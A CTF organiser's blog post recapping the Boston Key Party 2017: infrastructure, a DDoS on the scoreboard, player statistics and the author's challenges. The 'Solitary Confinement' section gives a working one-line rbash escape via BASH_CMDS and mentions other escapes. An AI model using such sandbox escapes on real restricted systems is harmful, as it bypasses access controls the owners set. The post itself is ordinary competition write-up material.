Artificial truth

The more you see, the less you believe.

[archives] [latest] | [homepage] | [atom/rss]

The Boston Key Party 2017
Mon 27 February 2017 — download

my splendid css-fu for the blk

This year, like the two previous one, I had the please to give a hand with the organisation of the Boston Key Party, a (hopefully) fun 48 hours long capture the flag event, serving as a qualification for the (prestigious) Defcon one.

Last year, crowell and Amat wrote a really good-looking scoreboard, but it had some performances issues (protip: don't use ncurses on a forking server with several thousand simultaneous users). This is why (and also because we wanted to have more people that could easily administer the scoreboard) this year we went with CTFd, with a (super-ghetto) custom theme (that I wrote in a hurry, mostly with tears and stress.).

The whole infrastructure was hosted on AWS: It's cheap (the whole CTF costed us 73USD), comes with a CDN (to palliate CTFd asthmatic behaviour), a WAF to block the DDoS attack (proudly powered by Wordpress xmlrpc.php) that hit the scoreboard around 02am (Paris time) Saturday, and it's dead simple to spawn new machines and to write them together.

Since I'm not über-proficient sysadmin, it was a fun opportunity to learn stuff like "How to manage fork bombs done by a single linux user, used by several hundred people at the same time?" Having a nice limits.conf will prevent your machine from burning to the ground, but it won't prevent people from maxing the number of processes, prevent others from logging in. Fortunately, one just have to do something like echo '1 * * * * root killall -u ctfuser -s SIGKILL --older-than 5' >> /etc/crontab to kill processes older than 5 minutes. Someone mumbled something about using cgroups, but failed to go any further with it.

Thanks to amazon, we have some random/mildly interesting numbers about the ctf and the players:

  • 43% of the requests to our infrastructure were from the USA, 6% from Korea, 6% from France, 4% from Japan and 4% from the Netherlands.
  • We suffered from several DDoS tentatives.
  • We served around 335GB of data in 48h, split in 2.5M http requests and 65K https ones.
  • A lot of people tried a fake flag for vimjail, found in /tmp/flag.txt.
  • A bit less than 1300 teams registered, and something like 1000 of them scored at least one point.
  • A bit more than 3000 wrong flags were submitted, and 2000 good ones, for our 23 challenges. We should throttle the number of flag submission next year, and agree on a flag format (some challs were using BKP{}, others bkp{} or FLAG{}).
  • Congratulations to HITCON, b1o0p and PPP for ranking respectively first, second and third.

Along with ensuring that every single task was up, running correctly, and could be managed by anyone in the team (mostly by yelling on Slack at people to get them do document their challenges) and telling random jokes in broken English doing support on irc,

I also wrote 3 different challenges:

Solitary Confinement

A couple of weeks ago, I was discussing with nurfed, about how we could improve a bit the 26th level of websec.fr, and he mentioned rbash, but thought that everyone was already sitting on private escapes, since he personally had several ones.

I wanted to check if this was true, so I did a simple challenge based on this: escape rbash! In total, 30 teams managed, in 48h, to find various 0days to escape from a rbash shell, in a chroot with only rbash, and a /fag/showFlag binary (along with the required library to make those run of course.). The fact that the challenge was in a super-small chroot killed a lot of various exploits that would have worked otherwise. So it seems that nurfed was wrong: not everyone had (or was willing to use) rbash escapes.

I was also wondering if people would be willing to burn their 0days in writeups/ on irc, or would be wise enough to stack them. On the other hand, since no one cares about rbash escapes, things would likely have been a bit different with more interesting/used sandboxes.

The intended solution was BASH_CMDS[a]=/flag/showFlag;a (PATH isn't writeable, but BASH_CMDS is.), but a team found another one based declare -n. Someone told me that at least one team went completely overkill and wrote a working exploit of a use after free in popd to escape to sandbox.

Sorry nurfed about people finding your escapes, but I'm sure that you still got working ones ;)

Beat in a box

Sansa e200v2 running the challenge

A bit more than 10 years ago (damn.) I bought a Sansa e200v2, and slapped Rockbox on it, it was amazing! Now that I know some C, I thought that it would make a great challenge to write a crackme plugin for it! You can find its source code here, and the whole archive here.

Wackusensor

This one was a modified accusensor, worth a complete article on its own ;)

Conclusion

We ran a small survey (powered by google forms, sorry), and this is what I retain from it:

  • ~60% of the surveyed found that difficulty just right, ~40% found it too hard, and 0% too easy.
  • Solitary Confinement was the most hated challenge ♥
  • ~75% of the surveyed thought that 48h is the right duration.
  • ~25% of the surveyed didn't joined the irc channel, and ~80% of them wanted to have updates via the website. We should address this point for next year.

I have a dump of some of the challenges, feel free to hit me if you forgot to download your favourite one.

I hope that everyone enjoyed playing it as much as we enjoyed holding the Boston Key Party, see you next year!